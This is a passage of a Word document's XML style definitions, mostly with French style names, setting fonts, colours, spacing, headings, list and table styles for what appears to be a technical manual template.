  <w:style w:type="character" w:customStyle="1" w:styleId="Policepardfaut1">
    <w:name w:val="Police par défaut1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="syntaxe">
    <w:name w:val="syntaxe"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Numrodepage1">
    <w:name w:val="Numéro de page1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="commande">
    <w:name w:val="commande"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Courier New"/>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Lienhypertexte1">
    <w:name w:val="Lien hypertexte1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Lienhypertextesuivivisit1">
    <w:name w:val="Lien hypertexte suivi visité1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre8CarCar">
    <w:name w:val="Titre 8 Car Car"/>
    <w:basedOn w:val="Policepardfaut1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000080"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Caractresdenumrotation">
    <w:name w:val="Caractères de numérotation"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BulletSymbols">
    <w:name w:val="Bullet Symbols"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Puces">
    <w:name w:val="Puces"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Numbering20Symbols">
    <w:name w:val="Numbering_20_Symbols"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bullet20Symbols">
    <w:name w:val="Bullet_20_Symbols"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Caractresdenotedebasdepage">
    <w:name w:val="Caractères de note de bas de page"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Accentuationforte">
    <w:name w:val="Accentuation forte"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Accentuation1">
    <w:name w:val="Accentuation1"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Sautdindex">
    <w:name w:val="Saut d'index"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Textesource">
    <w:name w:val="Texte source"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>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uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Droid Sans Fallback" w:hAnsi="Arial" w:cs="Mangal"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="fr-FR" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ObjetducommentaireCar">
    <w:name w:val="Objet du commentaire Car"/>
    <w:basedOn w:val="CommentaireCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Droid Sans Fallback" w:hAnsi="Arial" w:cs="Mangal"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="18"/>
      <w:lang w:val="fr-FR" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre10">
    <w:name w:val="Titre1"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Textbody"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Droid Sans Fallback" w:hAnsi="Liberation Sans" w:cs="FreeSans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Corpsdetexte">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Liste">
    <w:name w:val="List"/>
    <w:basedOn w:val="Corpsdetexte"/>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paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Notedefin">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tabledesillustrations">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sous-titre">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="En-tteetpieddepage">
    <w:name w:val="En-tête et pied de page"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4818"/>
        <w:tab w:val="right" w:pos="9637"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143"/>
        <w:tab w:val="right" w:pos="14287"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143"/>
        <w:tab w:val="right" w:pos="14287"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citation">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next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Notedebasdepage">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>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qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Textbody">
    <w:name w:val="Text body"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Liste1">
    <w:name w:val="Liste1"/>
    <w:basedOn w:val="Textbody"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Lgende1">
    <w:name w:val="Légende1"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre11">
    <w:name w:val="Titre 11"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="280"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7D9BFF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre21">
    <w:name w:val="Titre 21"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="280"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="B02200"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre31">
    <w:name w:val="Titre 31"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre41">
    <w:name w:val="Titre 41"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:iCs/>
      <w:color w:val="660066"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre51">
    <w:name w:val="Titre 51"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="660066"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre61">
    <w:name w:val="Titre 61"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre71">
    <w:name w:val="Titre 71"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre81">
    <w:name w:val="Titre 81"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre91">
    <w:name w:val="Titre 91"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="programlisting">
    <w:name w:val="programlisting"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="454"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Pieddepage1">
    <w:name w:val="Pied de page1"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4535"/>
        <w:tab w:val="right" w:pos="9071"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Important">
    <w:name w:val="Important"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Listepuces21">
    <w:name w:val="Liste à puces 21"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Listepuces1">
    <w:name w:val="Liste à puces1"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Listenumros1">
    <w:name w:val="Liste à numéros1"/>
    <w:basedOn w:val="Listepuces1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalWeb1">
    <w:name w:val="Normal (Web)1"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="En-tte1">
    <w:name w:val="En-tête1"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4535"/>
        <w:tab w:val="right" w:pos="9071"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleTitre4GrasGauche19cmSuspendu114cmAprs">
    <w:name w:val="Style Titre 4 + Gras Gauche :  19 cm Suspendu : 114 cm Après :..."/>
    <w:basedOn w:val="Titre41"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Explorateurdedocument">
    <w:name w:val="Explorateur de document"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="remarque">
    <w:name w:val="remarque"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="titredocument">
    <w:name w:val="titre_document"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="7D9BFF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="titrepartie">
    <w:name w:val="titre_partie"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="B02200"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents2">
    <w:name w:val="Contents 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents4">
    <w:name w:val="Contents 4"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="600"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents5">
    <w:name w:val="Contents 5"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents6">
    <w:name w:val="Contents 6"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1000"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents7">
    <w:name w:val="Contents 7"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents8">
    <w:name w:val="Contents 8"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contenudetableau">
    <w:name w:val="Contenu de tableau"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titredetableau">
    <w:name w:val="Titre de tableau"/>
    <w:basedOn w:val="Contenudetableau"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sous-titre1">
    <w:name w:val="Sous-titre1"/>
    <w:basedOn w:val="Titre10"/>
    <w:next w:val="Textbody"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="titresouspartie">
    <w:name w:val="titre_sous_partie"/>
    <w:basedOn w:val="remarque"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Liste31">
    <w:name w:val="Liste 31"/>
    <w:basedOn w:val="Liste1"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360" w:hanging="359"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Citations">
    <w:name w:val="Citations"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="283"/>
      <w:ind w:left="567" w:right="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titre12">
    <w:name w:val="Titre1"/>
    <w:basedOn w:val="Titre10"/>
    <w:next w:val="Textbody"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Footnote">
    <w:name w:val="Footnote"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="339" w:hanging="338"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Paragraphedeliste1">
    <w:name w:val="Paragraphe de liste1"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Texteprformat">
    <w:name w:val="Texte préformaté"/>
    <w:basedOn w:val="Standard"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="DejaVu Sans Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Commentaire">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Objetducommentaire">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Commentaire"/>
    <w:next w:val="Commentaire"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contenudecadre">
    <w:name w:val="Contenu de cadre"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>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Tableausimple1">
    <w:name w:val="Plain Table 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uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="Tableausimple4">
    <w:name w:val="Plain Table 4"/>
    <w:uiPriority w:val="99"/>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F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="Tableausimple5">
    <w:name w:val="Plain Table 5"/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille1Clair">
    <w:name w:val="Grid Table 1 Light"/>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4F81BD"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C0504D"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9BBB59"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8064A2"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4BACC6"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79646"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styleId="TableauGrille2">
    <w:name w:val="Grid Table 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auto" w:fill="FFFFFF"/>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2-Accent1">
    <w:name w:val="Grid Table 2 - Accent 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F81BD" w:themeColor="accent1"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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DAE5F1" w:themeFill="accent1" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAE5F1" w:themeFill="accent1" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable2-Accent2">
    <w:name w:val="Grid Table 2 - Accent 2"/>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C0504D" w:themeColor="accent2"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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customStyle="1" w:styleId="GridTable2-Accent3">
    <w:name w:val="Grid Table 2 - Accent 3"/>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BBB59" w:themeColor="accent3"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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customStyle="1" w:styleId="GridTable2-Accent4">
    <w:name w:val="Grid Table 2 - Accent 4"/>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8064A2" w:themeColor="accent4"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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customStyle="1" w:styleId="GridTable2-Accent5">
    <w:name w:val="Grid Table 2 - Accent 5"/>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customStyle="1" w:styleId="GridTable2-Accent6">
    <w:name w:val="Grid Table 2 - Accent 6"/>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styleId="TableauGrille3">
    <w:name w:val="Grid Table 3"/>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3-Accent1">
    <w:name w:val="Grid Table 3 - Accent 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DAE5F1" w:themeFill="accent1" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAE5F1" w:themeFill="accent1" w:themeFillTint="34"/>
